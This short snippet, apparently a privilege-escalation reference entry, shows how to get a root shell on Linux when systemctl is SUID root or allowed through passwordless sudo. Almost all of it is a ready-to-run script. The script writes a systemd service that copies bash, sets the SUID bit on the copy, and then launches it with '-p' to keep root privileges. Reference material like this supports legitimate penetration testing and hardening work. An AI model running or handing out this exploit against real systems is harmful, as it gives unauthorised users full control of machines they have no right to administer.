If systemctl is SUID root, then a malicious service file can easily be abused to create a root shell.

FILE=`mktemp -u`
 
cat > ${FILE}.service << EOF
[Service]
Type=oneshot
ExecStart=/bin/cp /bin/bash ${FILE}.sh
ExecStart=/bin/chmod +xs ${FILE}.sh
 
[Install]
WantedBy=multi-user.target
EOF
 
systemctl link ${FILE}.service
systemctl start ${FILE}.service
 
${FILE}.sh -p # Root!

Even if systemctl is not SUID root, so long as you have NOPASSWD sudo access to it this trick will still work.